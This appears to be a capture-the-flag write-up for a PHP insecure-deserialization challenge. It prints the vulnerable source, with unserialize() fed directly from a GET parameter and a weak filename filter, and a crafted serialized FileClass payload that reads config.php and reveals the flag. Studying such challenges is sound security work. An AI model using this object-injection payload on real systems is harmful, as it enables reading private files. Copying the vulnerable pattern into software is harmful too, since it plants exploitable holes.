On the index page, we can see a form containing many fields: first name, age, and a picture field containing a list of image files.
Once this form validated, we see a summary of what we entered previously, and our image, base64 encoded, into an <img> tag. So far, nothing weird.
But, by looking the webpage URL, we could find some datas which could be a serialized PHP object.
Why did not try to modify this cat5.png by something else than an image, as show.php for example ? 🙂
Bingo! We got the PHP code of the page, base64 encoded in the img  tag!
Once decode we clearly see an included php page.
<?php include('UClass.php'); $obj = unserialize($_GET['u']); echo $obj; ?>
By using the same method as above, we got the UClass.php source code.
<?php include('config.php'); class FileClass { public $filename = 'error.log'; public function __toString() { return file_get_contents($this->filename); } } class User { public $age = 0; public $name = ''; public $picture = 'null'; public function __toString() { $picture = $this->picture; if (preg_match("/\.\./",$picture)) { $picture = "null"; } if (preg_match("/config/",$picture)) { $picture = "null"; } if (preg_match("/\//",$picture)) { $picture = "null"; } if (preg_match("/^\./",$picture)) { $picture = "null"; } if (preg_match("/:/",$picture)) { $picture = "null"; } return '<center>Your cat "' . $this->name . '" is ' . $this->age . ' years old. ' . '<img height="200" width="200" src="data:image/png;base64,' . base64_encode(file_get_contents($picture)) . '"></center> '; } } ?>
From here, we can see all the source code  to load our summary webpage, and an config.php file included.
But there is one obvious trap: preg_match() blocking us loading config.php, with our previous technique.
However, the FileClass class will do a file_get_contents without worrying the file that it reads.
Let’s try to create a FileClass object with the variable $filename containing “config.php”,
<?php class FileClass { public $filename = 'error.log'; } $obj = new FileClass(); echo serialize($obj); // O:9:"FileClass":1:{s:8:"filename";s:9:"error.log";} ?>
Once unserialized on the server, the FileClass class is instantiated and then the content of config.php is printed with the __toString(), showing us the flag.
<?php $you_are_cool="8df751c556681f8bd815a582351654fe"; ?>